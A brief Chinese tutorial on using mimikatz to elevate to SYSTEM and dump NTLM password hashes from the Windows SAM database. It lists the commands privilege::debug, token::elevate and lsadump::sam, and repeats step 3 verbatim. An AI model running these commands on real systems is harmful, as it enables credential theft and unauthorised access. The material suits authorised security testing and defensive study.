工具:mimikatz
下载地址:https://github.com/gentilkiwi/mimikatz/releases
1、开启mimikatz。以管理员权限打开cmd,进入mimikatz相应操作系统的目录下,输入命令:
mimikatz.exe
2、提升权限,输入命令:
privilege::debug
(如果出现以下报错:ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限)
3、权限提升至 NT AUTHORITY\SYSTEM,输入命令:
token::elevate
3、权限提升至 NT AUTHORITY\SYSTEM,输入命令:
token::elevate
4、获取到NTLM的hash,输入命令:
lsadump::sam